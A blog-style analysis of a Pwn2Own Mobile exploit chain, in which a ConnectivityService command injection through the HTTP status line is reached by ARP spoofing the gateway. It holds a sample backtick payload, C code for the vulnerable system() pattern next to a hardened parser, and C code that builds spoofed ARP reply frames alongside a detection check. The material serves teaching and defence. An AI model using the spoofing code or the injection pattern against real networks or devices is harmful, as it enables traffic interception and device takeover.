On boot and every 300 seconds, the ConnectivityService binary runs a few connectivity checks: it tries to reach the REST server, pings the local gateway, and tries to reach the remote cloud.
To make the HTTP request it shells out to wget via system() from C. wget's output is written to a text file, which is then read back and checked for a response. The status code from that response is then fed into a logging command that goes through a second call to system(). Damn, system() has to be vulnerable, right?
If the server returns a malicious HTTP status line, that second system() call becomes a command injection. Something like HTTP/1.0 200 `touch /tmp/pwn2own` gets the backtick expression executed by the shell on the device. But the device only talks to its real server, so how do we get a malicious response in front of it? ARP spoofing!
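Here is what that pattern looks like in C, with the hardened version next to it. This is an added illustration, not the ConnectivityService code (the binary is not shown in the write-up); the exact wget invocation, the logger command line and the double-quoting around the status are assumptions. The vulnerable builder hands the whole remainder of the status line to /bin/sh via system(), and double quotes do nothing against backticks or $(...). The strict parser only ever produces a three-digit integer, so whatever the attacker puts after the code has nowhere to go.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <syslog.h>

#define CMD_MAX 512

/* Vulnerable pattern (assumed shape of the device code): take everything
 * after the HTTP version as the "status" and splice it into a shell command
 * line for logging. Returns 0 on success, -1 if the line does not look like
 * an HTTP status line or the command does not fit. The caller then does
 * system(cmd), i.e. /bin/sh -c cmd, so backticks in cmd are executed. */
int build_log_cmd_vulnerable(const char *status_line, char *cmd, size_t cmdlen) {
    const char *sp = strchr(status_line, ' ');
    if (strncmp(status_line, "HTTP/", 5) != 0 || sp == NULL)
        return -1;
    char status[CMD_MAX];
    snprintf(status, sizeof status, "%s", sp + 1);
    status[strcspn(status, "\r\n")] = '\0';   /* drop the CR/LF wget left on the line */
    /* Double quotes do not neutralise ` or $( ) for /bin/sh. */
    int n = snprintf(cmd, cmdlen,
                     "logger -t ConnectivityService \"cloud status: %s\"", status);
    return (n < 0 || (size_t)n >= cmdlen) ? -1 : 0;
}

/* Hardened parser: accept "HTTP/<d>.<d> <ddd>" followed by a space or end of
 * line and return the code as an int. Anything else is rejected, and the
 * reason phrase (where the payload sits) is never copied anywhere.
 * Returns 1 on success, 0 otherwise. Every p[i] read is guarded by the
 * check before it, so a short line cannot be over-read. */
int parse_status_code_strict(const char *status_line, int *code) {
    const char *p = status_line;
    if (strncmp(p, "HTTP/", 5) != 0) return 0;
    p += 5;
    if (!isdigit((unsigned char)p[0]) || p[1] != '.' ||
        !isdigit((unsigned char)p[2]) || p[3] != ' ')
        return 0;
    p += 4;
    for (int i = 0; i < 3; i++)
        if (!isdigit((unsigned char)p[i])) return 0;
    if (p[3] != ' ' && p[3] != '\r' && p[3] != '\n' && p[3] != '\0')
        return 0;
    *code = (p[0] - '0') * 100 + (p[1] - '0') * 10 + (p[2] - '0');
    return 1;
}

/* Hardened logger: the only attacker-influenced value is an int, formatted
 * with %d and handed to syslog(3). No shell is involved at any point. */
void log_status_safe(int code) {
    openlog("ConnectivityService", LOG_PID, LOG_DAEMON);
    syslog(LOG_INFO, "cloud status: %d", code);
    closelog();
}

int main(void) {
    /* Constructed status lines: a normal one and one shaped like the payload
     * in the write-up. */
    const char *benign = "HTTP/1.0 200 OK\r\n";
    const char *evil   = "HTTP/1.0 200 `touch /tmp/pwn2own`\r\n";
    char cmd[CMD_MAX];
    int code = 0;

    if (build_log_cmd_vulnerable(evil, cmd, sizeof cmd) == 0)
        printf("vulnerable path would run: system(\"%s\")\n", cmd);  /* not executed here */

    if (parse_status_code_strict(benign, &code)) {
        printf("strict parse of benign line: code %d\n", code);
        log_status_safe(code);
    }
    if (parse_status_code_strict(evil, &code))
        printf("strict parse of evil line: code %d, payload discarded\n", code);
    return 0;
}
```

Note that the strict parser does not "detect" the payload; it simply never copies it. That is the property you want from input handling in front of a logging or shell call: reduce untrusted data to the narrowest type that the next step actually needs.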
ARP (Address Resolution Protocol) messages are sent over the local area network (LAN) to map an IP address to a MAC address. ARP has no authentication, so an attacker can send forged ARP replies that bind the attacker's MAC address to the IP address of another host on the network. Any host that accepts the bogus mapping updates its ARP cache and from then on sends traffic meant for that IP to the attacker instead.
To control the response, they ARP spoof the device by sending it ARP replies claiming the LAN gateway's IP address belongs to the attacker's MAC, so that all outgoing traffic from the target device heads the attacker's way. Once that is in place, they use scapy to sniff the device's ICMP and DNS traffic and answer it themselves, which keeps the checks running and steers the device at the attacker's HTTP server. Finally, the ConnectivityService contacts that malicious HTTP server, which serves the command injection payload in the status line. Neat!
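The poisoning step, as an added example rather than the team's scapy script: this builds the unsolicited ARP reply that tells the device the gateway's IP now lives at the attacker's MAC, parses such a frame back, and includes the check a defender would run over captured ARP traffic (does the packet claim an IP for a MAC other than the one we already know it belongs to?). The addresses are made up. Actually putting the frame on the wire needs a raw AF_PACKET socket or scapy's sendp(), and answering the device's ICMP and DNS afterwards is not reproduced here.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ETH_HLEN  14
#define ARP_LEN   28
#define FRAME_LEN (ETH_HLEN + ARP_LEN)

/* Decoded fields of an IPv4-over-Ethernet ARP packet (RFC 826 layout). */
struct arp_info {
    uint16_t opcode;          /* 1 = request, 2 = reply */
    uint8_t  sender_mac[6];
    uint32_t sender_ip;       /* host byte order */
    uint8_t  target_mac[6];
    uint32_t target_ip;       /* host byte order */
};

static void put16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)(v >> 8); p[1] = (uint8_t)v; }
static void put32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)(v >> 24); p[1] = (uint8_t)(v >> 16);
    p[2] = (uint8_t)(v >> 8);  p[3] = (uint8_t)v;
}
static uint16_t get16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }
static uint32_t get32(const uint8_t *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}

/* Pack a.b.c.d into a host-order uint32_t. */
uint32_t ip4(int a, int b, int c, int d) {
    return ((uint32_t)a << 24) | ((uint32_t)b << 16) | ((uint32_t)c << 8) | (uint32_t)d;
}

/* Build the spoofed reply: an Ethernet frame from attacker_mac to victim_mac
 * carrying an ARP reply whose sender pair is (attacker_mac, gateway_ip).
 * The victim caches that pair and starts sending gateway-bound traffic to
 * the attacker. Returns bytes written (42) or 0 if buf is too small. */
size_t build_arp_spoof_reply(uint8_t *buf, size_t buflen,
                             const uint8_t victim_mac[6], uint32_t victim_ip,
                             const uint8_t attacker_mac[6], uint32_t gateway_ip) {
    if (buflen < FRAME_LEN) return 0;
    uint8_t *e = buf, *a = buf + ETH_HLEN;
    memcpy(e, victim_mac, 6);        /* Ethernet dst */
    memcpy(e + 6, attacker_mac, 6);  /* Ethernet src */
    put16(e + 12, 0x0806);           /* EtherType ARP */
    put16(a, 1);                     /* HTYPE Ethernet */
    put16(a + 2, 0x0800);            /* PTYPE IPv4 */
    a[4] = 6; a[5] = 4;              /* HLEN, PLEN */
    put16(a + 6, 2);                 /* opcode: reply */
    memcpy(a + 8, attacker_mac, 6);  /* sender MAC = attacker */
    put32(a + 14, gateway_ip);       /* sender IP  = gateway (the lie) */
    memcpy(a + 18, victim_mac, 6);   /* target MAC = victim */
    put32(a + 24, victim_ip);        /* target IP  = victim */
    return FRAME_LEN;
}

/* Parse a frame into arp_info. Returns 1 for a well-formed IPv4-over-Ethernet
 * ARP packet, 0 for anything else (wrong EtherType, truncated, odd sizes). */
int parse_arp(const uint8_t *buf, size_t len, struct arp_info *out) {
    if (len < FRAME_LEN || get16(buf + 12) != 0x0806) return 0;
    const uint8_t *a = buf + ETH_HLEN;
    if (get16(a) != 1 || get16(a + 2) != 0x0800 || a[4] != 6 || a[5] != 4) return 0;
    out->opcode = get16(a + 6);
    memcpy(out->sender_mac, a + 8, 6);
    out->sender_ip = get32(a + 14);
    memcpy(out->target_mac, a + 18, 6);
    out->target_ip = get32(a + 24);
    return 1;
}

/* Detection check: does this packet claim known_ip for a MAC other than
 * known_mac? Returns 1 for a conflicting claim (spoof indicator), else 0. */
int arp_conflicts_with_binding(const uint8_t *buf, size_t len,
                               uint32_t known_ip, const uint8_t known_mac[6]) {
    struct arp_info info;
    if (!parse_arp(buf, len, &info)) return 0;
    return info.sender_ip == known_ip && memcmp(info.sender_mac, known_mac, 6) != 0;
}

int main(void) {
    /* Constructed addresses, not from the write-up. */
    const uint8_t victim_mac[6]   = {0x00, 0x11, 0x22, 0x33, 0x44, 0x55};
    const uint8_t attacker_mac[6] = {0xde, 0xad, 0xbe, 0xef, 0x00, 0x01};
    const uint8_t gateway_mac[6]  = {0x00, 0xaa, 0xbb, 0xcc, 0xdd, 0xee};
    uint8_t frame[FRAME_LEN];
    size_t n = build_arp_spoof_reply(frame, sizeof frame, victim_mac, ip4(192, 168, 1, 50),
                                     attacker_mac, ip4(192, 168, 1, 1));
    for (size_t i = 0; i < n; i++)
        printf("%02x%s", frame[i], ((i + 1) % 16) ? " " : "\n");
    printf("\nconflicts with known gateway binding: %d\n",
           arp_conflicts_with_binding(frame, n, ip4(192, 168, 1, 1), gateway_mac));
    return 0;
}
```

The attacker repeats this frame every second or so, because the victim's ARP cache entry expires and a real reply from the gateway can overwrite it. The same expiry is why the defender's check has to run continuously over captured traffic rather than once.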
While running the exploit at Pwn2Own Mobile, they made a critical mistake: they had hardcoded an IP address from the local network of their test environment. They did notice the problem and fixed it on the fly, but their time ran out because the device was no longer making DNS requests. Sad :(
Overall, this is an awesome chain! I enjoyed how they turned an obvious command injection in a seemingly unreachable spot into something controllable via ARP spoofing. Using TLS with proper certificate validation for the cloud check would have kept a spoofed response from ever reaching the vulnerable code, but the root cause is building a shell command out of response data, so the real fix is to stop passing that data to system() at all.